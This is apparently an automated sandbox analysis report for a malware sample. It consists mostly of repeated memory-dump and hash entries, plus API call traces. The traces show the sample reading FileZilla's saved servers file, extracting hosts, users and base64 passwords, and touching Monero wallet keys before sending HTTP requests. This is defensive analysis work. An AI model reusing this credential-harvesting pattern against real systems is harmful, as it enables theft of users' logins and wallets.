                            • Source File: 00000000.00000002.1729779509.000000000060E000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                            • Associated: 00000000.00000002.1729580808.00000000003B0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729604238.0000000000461000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729604238.000000000046D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729604238.0000000000492000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729604238.00000000005FA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729779509.0000000000790000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729779509.0000000000865000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729779509.0000000000889000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729779509.0000000000892000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729779509.00000000008A1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1730050524.00000000008A2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1730162551.0000000000A34000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1730178781.0000000000A35000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 3ac1acd102884eaf76af241c5a704e129f6e3fb59d579151c2994f4b7ada652a
                            • Instruction ID: a2437bc05374e58d82a9d779a48b889e29b840b322a1274031db1c79c711673b
                            • Opcode Fuzzy Hash: 3ac1acd102884eaf76af241c5a704e129f6e3fb59d579151c2994f4b7ada652a
                            • Instruction Fuzzy Hash: 233228F360C2109FE7046E2DEC8567ABBE9EFD8660F1A4A3DEAC4C3744E53548418796
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729779509.000000000060E000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                            • Associated: 00000000.00000002.1729580808.00000000003B0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729604238.0000000000461000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729604238.000000000046D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729604238.0000000000492000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729604238.00000000005FA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729779509.0000000000790000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729779509.0000000000865000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729779509.0000000000889000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729779509.0000000000892000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729779509.00000000008A1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1730050524.00000000008A2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1730162551.0000000000A34000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1730178781.0000000000A35000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: fb00ff3772828caf20c293c7b20293cd031bff1179a5e2fa0445c0bfc3090207
                            • Instruction ID: 227fa8a4eeb9d18969d966ee2439d39c65bac4018e2602526f7f4e8912da7074
                            • Opcode Fuzzy Hash: fb00ff3772828caf20c293c7b20293cd031bff1179a5e2fa0445c0bfc3090207
                            • Instruction Fuzzy Hash: D26114F3A487085BF3086E29EC86776B7D5EB94720F1A063DE689D73C4F9795801824A
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729779509.000000000060E000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                            • Associated: 00000000.00000002.1729580808.00000000003B0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729604238.0000000000461000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729604238.000000000046D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729604238.0000000000492000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729604238.00000000005FA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729779509.0000000000790000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729779509.0000000000865000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729779509.0000000000889000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729779509.0000000000892000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729779509.00000000008A1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1730050524.00000000008A2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1730162551.0000000000A34000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1730178781.0000000000A35000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: b06ca14047dea56fd4a47f9de372a9935495618507e89b7fc11ba0e813604e19
                            • Instruction ID: 7abbe65524e224defa845bf1294fe6fc75d51f030672d6aa321290b8a1c9e4a8
                            • Opcode Fuzzy Hash: b06ca14047dea56fd4a47f9de372a9935495618507e89b7fc11ba0e813604e19
                            • Instruction Fuzzy Hash: 695118F36085005BF348E92ADC56BBAB7DBDBD8320F1AC53DE695C7788D93498018296
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729779509.000000000060E000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                            • Associated: 00000000.00000002.1729580808.00000000003B0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729604238.0000000000461000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729604238.000000000046D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729604238.0000000000492000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729604238.00000000005FA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729779509.0000000000790000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729779509.0000000000865000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729779509.0000000000889000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729779509.0000000000892000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729779509.00000000008A1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1730050524.00000000008A2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1730162551.0000000000A34000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1730178781.0000000000A35000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 79c9266848d376d7a8a147aea0dd98db399bc4178c720088d7b18723af1baf06
                            • Instruction ID: ce8efe676af2976ff764386490a4be5f15231f2ad149b6902b24526a1259f0e5
                            • Opcode Fuzzy Hash: 79c9266848d376d7a8a147aea0dd98db399bc4178c720088d7b18723af1baf06
                            • Instruction Fuzzy Hash: 2D5146F3A092005BE30C6E3DED9563BB7D6DBD4730F1A863DE69587B84EC3918064256
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729779509.0000000000790000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                            • Associated: 00000000.00000002.1729580808.00000000003B0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729604238.0000000000461000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729604238.000000000046D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729604238.0000000000492000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729604238.00000000005FA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729779509.000000000060E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729779509.0000000000865000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729779509.0000000000889000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729779509.0000000000892000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729779509.00000000008A1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1730050524.00000000008A2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1730162551.0000000000A34000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1730178781.0000000000A35000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 1467a05fc83d51f3c51713b39dbcf77e13c74cb59a717fac8c21647cc7e5b7af
                            • Instruction ID: 64d1a22de1c7be90681f325a905b0efd107125cd743e5974fd1344b2444dc851
                            • Opcode Fuzzy Hash: 1467a05fc83d51f3c51713b39dbcf77e13c74cb59a717fac8c21647cc7e5b7af
                            • Instruction Fuzzy Hash: 34512EB650C228DFD304AE28F84563AB7E0FB90364F22592DD7C6C7244EA3418D5A7A3
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729779509.000000000060E000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                            • Associated: 00000000.00000002.1729580808.00000000003B0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729604238.0000000000461000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729604238.000000000046D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729604238.0000000000492000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729604238.00000000005FA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729779509.0000000000790000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729779509.0000000000865000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729779509.0000000000889000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729779509.0000000000892000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729779509.00000000008A1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1730050524.00000000008A2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1730162551.0000000000A34000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1730178781.0000000000A35000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: de2143104ffbd25da71c13e5abc2fc9830d44846d169f0701db6dce3cf403c25
                            • Instruction ID: c0d50cf53acc15d2923c98a5cba29eb53aa4c23e4727598ff7430b9874085560
                            • Opcode Fuzzy Hash: de2143104ffbd25da71c13e5abc2fc9830d44846d169f0701db6dce3cf403c25
                            • Instruction Fuzzy Hash: 2D413AF3B042085BF3486E2DEC1537B77D6EBC4320F19423DDA8987785E93AA9058286
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729779509.0000000000790000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                            • Associated: 00000000.00000002.1729580808.00000000003B0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729604238.0000000000461000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729604238.000000000046D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729604238.0000000000492000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729604238.00000000005FA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729779509.000000000060E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729779509.0000000000865000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729779509.0000000000889000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729779509.0000000000892000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729779509.00000000008A1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1730050524.00000000008A2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1730162551.0000000000A34000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1730178781.0000000000A35000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 207a41ec6693f4476f1617a7dca2d0664a6c79ca9b80ba94a829c5886246ff53
                            • Instruction ID: 6f8b03f13e9c5c706761592b20f60f9ffbcae1e9dfd3805336e9ea9256d43761
                            • Opcode Fuzzy Hash: 207a41ec6693f4476f1617a7dca2d0664a6c79ca9b80ba94a829c5886246ff53
                            • Instruction Fuzzy Hash: 7C317CB330C508DBE2449D25DC85A77B7B6FBD431AFB5892DDA83C3304F5718418A252
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                            • Associated: 00000000.00000002.1729580808.00000000003B0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729604238.0000000000461000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729604238.000000000046D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729604238.0000000000492000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729604238.00000000005FA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729779509.000000000060E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729779509.0000000000790000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729779509.0000000000865000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729779509.0000000000889000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729779509.0000000000892000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729779509.00000000008A1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1730050524.00000000008A2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1730162551.0000000000A34000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1730178781.0000000000A35000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                            • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                            • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                            • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                            APIs
                              • Part of subcall function 003CA740: lstrcpy.KERNEL32(003D0E17,00000000), ref: 003CA788
                              • Part of subcall function 003C8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 003C8E0B
                              • Part of subcall function 003CA920: lstrcpy.KERNEL32(00000000,?), ref: 003CA972
                              • Part of subcall function 003CA920: lstrcat.KERNEL32(00000000), ref: 003CA982
                              • Part of subcall function 003CA8A0: lstrcpy.KERNEL32(?,003D0E17), ref: 003CA905
                              • Part of subcall function 003CA9B0: lstrlen.KERNEL32(?,01088F58,?,\Monero\wallet.keys,003D0E17), ref: 003CA9C5
                              • Part of subcall function 003CA9B0: lstrcpy.KERNEL32(00000000), ref: 003CAA04
                              • Part of subcall function 003CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003CAA12
                              • Part of subcall function 003CA7A0: lstrcpy.KERNEL32(?,00000000), ref: 003CA7E6
                              • Part of subcall function 003B99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 003B99EC
                              • Part of subcall function 003B99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 003B9A11
                              • Part of subcall function 003B99C0: LocalAlloc.KERNEL32(00000040,?), ref: 003B9A31
                              • Part of subcall function 003B99C0: ReadFile.KERNEL32(000000FF,?,00000000,003B148F,00000000), ref: 003B9A5A
                              • Part of subcall function 003B99C0: LocalFree.KERNEL32(003B148F), ref: 003B9A90
                              • Part of subcall function 003B99C0: CloseHandle.KERNEL32(000000FF), ref: 003B9A9A
                              • Part of subcall function 003C8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 003C8E52
                            • GetProcessHeap.KERNEL32(00000000,000F423F,003D0DBA,003D0DB7,003D0DB6,003D0DB3), ref: 003C0362
                            • RtlAllocateHeap.NTDLL(00000000), ref: 003C0369
                            • StrStrA.SHLWAPI(00000000,<Host>), ref: 003C0385
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,003D0DB2), ref: 003C0393
                            • StrStrA.SHLWAPI(00000000,<Port>), ref: 003C03CF
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,003D0DB2), ref: 003C03DD
                            • StrStrA.SHLWAPI(00000000,<User>), ref: 003C0419
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,003D0DB2), ref: 003C0427
                            • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 003C0463
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,003D0DB2), ref: 003C0475
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,003D0DB2), ref: 003C0502
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,003D0DB2), ref: 003C051A
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,003D0DB2), ref: 003C0532
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,003D0DB2), ref: 003C054A
                            • lstrcat.KERNEL32(?,browser: FileZilla), ref: 003C0562
                            • lstrcat.KERNEL32(?,profile: null), ref: 003C0571
                            • lstrcat.KERNEL32(?,url: ), ref: 003C0580
                            • lstrcat.KERNEL32(?,00000000), ref: 003C0593
                            • lstrcat.KERNEL32(?,003D1678), ref: 003C05A2
                            • lstrcat.KERNEL32(?,00000000), ref: 003C05B5
                            • lstrcat.KERNEL32(?,003D167C), ref: 003C05C4
                            • lstrcat.KERNEL32(?,login: ), ref: 003C05D3
                            • lstrcat.KERNEL32(?,00000000), ref: 003C05E6
                            • lstrcat.KERNEL32(?,003D1688), ref: 003C05F5
                            • lstrcat.KERNEL32(?,password: ), ref: 003C0604
                            • lstrcat.KERNEL32(?,00000000), ref: 003C0617
                            • lstrcat.KERNEL32(?,003D1698), ref: 003C0626
                            • lstrcat.KERNEL32(?,003D169C), ref: 003C0635
                            • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,003D0DB2), ref: 003C068E
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                            • Associated: 00000000.00000002.1729580808.00000000003B0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729604238.0000000000461000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729604238.000000000046D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729604238.0000000000492000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729604238.00000000005FA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729779509.000000000060E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729779509.0000000000790000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729779509.0000000000865000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729779509.0000000000889000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729779509.0000000000892000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729779509.00000000008A1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1730050524.00000000008A2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1730162551.0000000000A34000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1730178781.0000000000A35000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                            • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                            • API String ID: 1942843190-555421843
                            • Opcode ID: 2051956780bb72e9f0d786cc24111d3b8b0403090649330ded4c0dea1aaac151
                            • Instruction ID: ddd82301c6176c0679aac901efa038f19008add7cf13dae06739643c5aac7aa7
                            • Opcode Fuzzy Hash: 2051956780bb72e9f0d786cc24111d3b8b0403090649330ded4c0dea1aaac151
                            • Instruction Fuzzy Hash: 42D12DB6900208ABCB06EBE4DD96FEE7738EF14304F50451DF506EA191DE74AE09DB62
                            APIs
                              • Part of subcall function 003CA7A0: lstrcpy.KERNEL32(?,00000000), ref: 003CA7E6
                              • Part of subcall function 003B47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 003B4839
                              • Part of subcall function 003B47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 003B4849
                              • Part of subcall function 003CA740: lstrcpy.KERNEL32(003D0E17,00000000), ref: 003CA788
                            • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 003B59F8
                            • StrCmpCA.SHLWAPI(?,0108E7B8), ref: 003B5A13
                            • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 003B5B93
                            • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,0108E7D8,00000000,?,0108A300,00000000,?,003D1A1C), ref: 003B5E71
                            • lstrlen.KERNEL32(00000000), ref: 003B5E82
                            • GetProcessHeap.KERNEL32(00000000,?), ref: 003B5E93
                            • RtlAllocateHeap.NTDLL(00000000), ref: 003B5E9A
                            • lstrlen.KERNEL32(00000000), ref: 003B5EAF
                            • lstrlen.KERNEL32(00000000), ref: 003B5ED8
                            • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 003B5EF1
                            • lstrlen.KERNEL32(00000000,?,?), ref: 003B5F1B
                            • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 003B5F2F
                            • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 003B5F4C
                            • InternetCloseHandle.WININET(00000000), ref: 003B5FB0
                            • InternetCloseHandle.WININET(00000000), ref: 003B5FBD
                            • HttpOpenRequestA.WININET(00000000,0108E8C8,?,0108DFD8,00000000,00000000,00400100,00000000), ref: 003B5BF8
                              • Part of subcall function 003CA9B0: lstrlen.KERNEL32(?,01088F58,?,\Monero\wallet.keys,003D0E17), ref: 003CA9C5
                              • Part of subcall function 003CA9B0: lstrcpy.KERNEL32(00000000), ref: 003CAA04
                              • Part of subcall function 003CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003CAA12
                              • Part of subcall function 003CA8A0: lstrcpy.KERNEL32(?,003D0E17), ref: 003CA905
                              • Part of subcall function 003CA920: lstrcpy.KERNEL32(00000000,?), ref: 003CA972
                              • Part of subcall function 003CA920: lstrcat.KERNEL32(00000000), ref: 003CA982
                            • InternetCloseHandle.WININET(00000000), ref: 003B5FC7
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                            • Associated: 00000000.00000002.1729580808.00000000003B0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729604238.0000000000461000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729604238.000000000046D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729604238.0000000000492000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729604238.00000000005FA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729779509.000000000060E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729779509.0000000000790000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729779509.0000000000865000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729779509.0000000000889000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729779509.0000000000892000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729779509.00000000008A1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1730050524.00000000008A2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1730162551.0000000000A34000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1730178781.0000000000A35000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                            • String ID: "$"$------$------$------
                            • API String ID: 874700897-2180234286
                            • Opcode ID: 58ba297e5bc38440ea3cde31412b59d2f86054a279d4bd771e3954cf1c9d7038
                            • Instruction ID: 1fea78f0703e46570d279e32e2393363c10809d212cf58f0c8d7680a4dd14918
                            • Opcode Fuzzy Hash: 58ba297e5bc38440ea3cde31412b59d2f86054a279d4bd771e3954cf1c9d7038
                            • Instruction Fuzzy Hash: 9812ED7182061CABDB16EBA0DC96FEEB778BF14704F50419DB10AA6091DF702E49CF66
                            APIs
                              • Part of subcall function 003CA740: lstrcpy.KERNEL32(003D0E17,00000000), ref: 003CA788
                              • Part of subcall function 003CA9B0: lstrlen.KERNEL32(?,01088F58,?,\Monero\wallet.keys,003D0E17), ref: 003CA9C5
                              • Part of subcall function 003CA9B0: lstrcpy.KERNEL32(00000000), ref: 003CAA04
                              • Part of subcall function 003CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003CAA12
                              • Part of subcall function 003CA8A0: lstrcpy.KERNEL32(?,003D0E17), ref: 003CA905
                              • Part of subcall function 003C8B60: GetSystemTime.KERNEL32(003D0E1A,0108A270,003D05AE,?,?,003B13F9,?,0000001A,003D0E1A,00000000,?,01088F58,?,\Monero\wallet.keys,003D0E17), ref: 003C8B86
                              • Part of subcall function 003CA920: lstrcpy.KERNEL32(00000000,?), ref: 003CA972
                              • Part of subcall function 003CA920: lstrcat.KERNEL32(00000000), ref: 003CA982
                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 003BCF83
                            • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 003BD0C7
